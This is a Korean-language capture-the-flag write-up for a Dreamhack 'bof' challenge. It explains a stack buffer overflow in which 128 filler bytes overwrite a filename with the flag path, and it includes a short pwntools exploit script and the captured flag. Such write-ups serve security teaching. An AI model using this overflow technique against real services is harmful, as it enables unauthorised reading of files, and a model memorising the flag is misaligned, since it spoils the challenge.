[Dream hack] bof

---

https://dreamhack.io/wargame/challenges/1111

bof

---

 

---

답

처음 파일을 보면 Dockerfile이 있고 deploy 폴더가 있는데

이 deploy 안에는 bof cat flag 이렇게 새게의 파일이 있다.

그중에서 bof가 코드라고 생각했고 IDA로 열어보았다.

이게 코드인거 같은데 그럼 v4에 입력을 받는 것을 알 수 있다.

그러나 v4의 크기는 128인데 입력을 144만큼 받을 수 있다. 여기서 bof를 쓸 수 있다.

 

128개의 더미 값을 입력해주고, flag가 있다고한 /home/bof/flag 을 입력해주면 된다.

그럼 출력에서 /home/bof/flag의 값을 출력하게 된다.

 

익스플로잇 코드를 짠다.

처음에는 서버 연결을 해주고

페이로드 작성하고 서버에 보내준다.

'c'를 128개 그리고 flag가 있는 주소를 보내준다.

 

전체 코드

from pwn import *
p=remote("host3.dreamhack.games",14960)

chuu=b'c'*128+b'/home/bof/flag'
p.sendlineafter(b'meow? ',chuu)


p.interactive()

DH{5cd1f793ae6a081e4bfd28f6d570d83355148245fbe7c1f69b12771202b80a13}

---

끝